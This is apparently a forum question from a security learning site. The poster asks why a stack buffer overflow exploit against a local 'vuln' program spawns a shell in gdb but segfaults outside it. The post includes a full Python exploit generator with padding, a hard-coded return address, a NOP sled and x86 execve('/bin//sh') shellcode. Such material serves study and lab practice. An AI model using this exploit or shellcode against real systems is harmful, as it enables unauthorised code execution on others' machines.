I'm trying to implement a buffer overflow attack and get shell access. For generating the exploited input, my Python file is as follows:
import struct
padding = "A"*160
eip = struct.pack("I", 0xffffcd70)
nopslide = "\x90"*100
payload = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
print padding+eip+nopslide+payload
Let's say I store the output of the Python script in a file named exp.
Now, when I run the vulnerable program in gdb, with r < exp, I get
process 190136 is executing new program: /usr/bin/dash
[Inferior 1 (process 190136) exited normally]
But when I run the program without gdb, e.g. like python exploit.py | ./vuln, I get a segmentation fault.
Any clues on what I'm doing wrong, and why the program works in gdb but not without it?
from hacking: security in practice https://ift.tt/6m7RMOA